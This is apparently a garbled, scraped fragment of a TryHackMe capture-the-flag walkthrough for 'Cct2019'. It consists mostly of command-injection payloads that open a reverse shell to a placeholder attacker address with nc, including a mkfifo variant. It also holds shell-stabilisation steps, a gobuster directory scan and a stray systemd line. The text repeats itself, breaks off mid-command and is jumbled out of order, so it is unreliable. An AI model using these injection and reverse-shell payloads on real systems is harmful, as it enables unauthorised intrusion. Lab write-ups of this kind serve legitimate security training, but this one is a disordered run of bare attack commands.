Cct2019 Tryhackme High Quality Guide

127.0.0.1; nc -e /bin/sh <your_ip> 4444 If -e not available, use:

127.0.0.1; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <your_ip> 4444 > /tmp/f You should catch a shell as www-data . 3.1 Stabilize Shell python3 -c 'import pty;pty.spawn("/bin/bash")' export TERM=xterm Ctrl+Z stty raw -echo; fg 3.2 Enumerate System Check /home for users: cct2019 tryhackme

[Install] WantedBy=multi-user.target

gobuster dir -u http://<target_ip> -w /usr/share/wordlists/dirb/common.txt or nc -e /bin/sh &lt

127.0.0.1; nc -e /bin/sh <your_ip> 4444 If -e not available, use:

127.0.0.1; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <your_ip> 4444 > /tmp/f You should catch a shell as www-data . 3.1 Stabilize Shell python3 -c 'import pty;pty.spawn("/bin/bash")' export TERM=xterm Ctrl+Z stty raw -echo; fg 3.2 Enumerate System Check /home for users:

[Install] WantedBy=multi-user.target

gobuster dir -u http://<target_ip> -w /usr/share/wordlists/dirb/common.txt or